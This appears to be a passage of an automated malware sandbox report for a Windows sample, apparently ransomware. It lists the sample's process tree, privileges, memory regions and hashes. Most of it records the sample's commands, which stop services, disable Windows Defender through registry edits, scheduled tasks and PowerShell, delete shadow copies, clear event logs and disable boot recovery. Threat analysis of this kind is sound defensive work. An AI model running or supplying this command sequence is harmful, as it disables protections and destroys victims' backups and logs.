| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\SyncClear.txt
Network
Files
memory/588-54-0x0000000000000000-mapping.dmp
memory/556-55-0x0000000000000000-mapping.dmp
memory/872-56-0x0000000000000000-mapping.dmp
memory/1436-57-0x0000000000000000-mapping.dmp
memory/1644-58-0x0000000000000000-mapping.dmp
memory/640-59-0x0000000000000000-mapping.dmp
memory/692-60-0x0000000000000000-mapping.dmp
memory/1440-61-0x0000000000000000-mapping.dmp
memory/1544-62-0x0000000000000000-mapping.dmp
memory/1156-63-0x0000000000000000-mapping.dmp
memory/1100-64-0x0000000000000000-mapping.dmp
memory/1060-65-0x0000000000000000-mapping.dmp
memory/1280-66-0x0000000000000000-mapping.dmp
memory/1496-67-0x0000000000000000-mapping.dmp
memory/1172-68-0x0000000000000000-mapping.dmp
memory/1632-69-0x0000000000000000-mapping.dmp
memory/1136-70-0x0000000000000000-mapping.dmp
memory/1624-71-0x0000000000000000-mapping.dmp
memory/1404-72-0x0000000000000000-mapping.dmp
memory/1684-73-0x0000000000000000-mapping.dmp
memory/1688-74-0x0000000000000000-mapping.dmp
memory/1292-75-0x0000000000000000-mapping.dmp
memory/1776-76-0x0000000000000000-mapping.dmp
memory/1932-77-0x0000000000000000-mapping.dmp
memory/1964-78-0x0000000000000000-mapping.dmp
memory/332-79-0x0000000000000000-mapping.dmp
memory/1204-80-0x0000000000000000-mapping.dmp
memory/1244-81-0x0000000000000000-mapping.dmp
memory/892-82-0x0000000000000000-mapping.dmp
memory/984-83-0x0000000000000000-mapping.dmp
memory/1060-84-0x0000000000000000-mapping.dmp
memory/1884-85-0x0000000000000000-mapping.dmp
memory/1160-86-0x0000000000000000-mapping.dmp
memory/1020-87-0x0000000000000000-mapping.dmp
memory/1996-88-0x0000000000000000-mapping.dmp
memory/1328-89-0x0000000000000000-mapping.dmp
memory/1904-90-0x0000000000000000-mapping.dmp
memory/1416-91-0x0000000000000000-mapping.dmp
memory/1092-92-0x0000000000000000-mapping.dmp
memory/900-93-0x0000000000000000-mapping.dmp
memory/1720-94-0x0000000000000000-mapping.dmp
memory/836-95-0x0000000000000000-mapping.dmp
memory/436-96-0x0000000000000000-mapping.dmp
memory/876-97-0x0000000000000000-mapping.dmp
memory/1116-98-0x0000000000000000-mapping.dmp
memory/1016-99-0x0000000000000000-mapping.dmp
memory/1772-100-0x0000000000000000-mapping.dmp
memory/1936-101-0x0000000000000000-mapping.dmp
memory/1908-102-0x0000000000000000-mapping.dmp
memory/1744-103-0x0000000000000000-mapping.dmp
memory/1032-104-0x0000000000000000-mapping.dmp
memory/1976-105-0x0000000000000000-mapping.dmp
memory/676-106-0x0000000000000000-mapping.dmp
memory/1672-107-0x0000000000000000-mapping.dmp
memory/2020-108-0x0000000000000000-mapping.dmp
memory/1764-109-0x0000000000000000-mapping.dmp
memory/908-110-0x0000000000000000-mapping.dmp
memory/1124-111-0x0000000000000000-mapping.dmp
memory/1836-112-0x0000000000000000-mapping.dmp
memory/1836-113-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
memory/1780-114-0x0000000000000000-mapping.dmp
memory/1792-116-0x0000000000000000-mapping.dmp
memory/1520-118-0x0000000000000000-mapping.dmp
memory/1104-119-0x0000000000000000-mapping.dmp
memory/2064-120-0x0000000000000000-mapping.dmp
memory/2160-123-0x0000000002520000-0x0000000002522000-memory.dmp
memory/2160-124-0x0000000002522000-0x0000000002524000-memory.dmp
memory/2160-125-0x0000000002524000-0x0000000002527000-memory.dmp
memory/2160-122-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp
memory/2160-126-0x000000000252B000-0x000000000254A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9ad30b90d95b927865dcb9b5f08378f4 |
| SHA1 | fbef6c732e0bee170b0bdb364a9067d0f1bd7432 |
| SHA256 | b0ee39302e0fb658a806cbef819b6e3a3334cd15220993a8865380ebcef47b2f |
| SHA512 | 78e2834d7494f289a371ae01ddf7d794a506748f718e6d0b678a4cf24496246fe92c6dcce12c3b9c5df5c4c55aabc91e2a7ec57109a85a529a8477223c0bf40d |
memory/2248-129-0x000007FEF1CC0000-0x000007FEF281D000-memory.dmp
memory/2248-130-0x0000000002460000-0x0000000002462000-memory.dmp
memory/2248-131-0x0000000002462000-0x0000000002464000-memory.dmp
memory/2248-132-0x0000000002464000-0x0000000002467000-memory.dmp
memory/2248-133-0x000000000246B000-0x000000000248A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 14:10
Reported
2022-01-12 14:12
Platform
win10-en-20211208
Max time kernel
5s
Max time network
130s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"